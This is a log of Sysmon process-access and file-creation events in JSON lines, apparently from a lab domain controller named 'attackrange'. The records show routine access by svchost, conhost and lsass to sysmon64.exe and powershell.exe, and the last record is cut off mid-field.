{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4571,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.861\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.861","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.892\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.892","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.892\r\nProcessGuid: {41C8662E-20BF-5F25-0000-001075D20600}\r\nProcessId: 4152\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xxuijehl.kw1.ps1\r\nCreationUtcTime: 2020-08-01 07:58:55.892","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.892","ProcessGuid":"{41C8662E-20BF-5F25-0000-001075D20600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_xxuijehl.kw1.ps1","CreationUtcTime":"2020-08-01 07:58:55.892","EventReceivedTime":"2020-08-01 07:58:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:55.939\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001075D20600}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:55.939","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001075D20600}","TargetProcessId":"4152","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventRec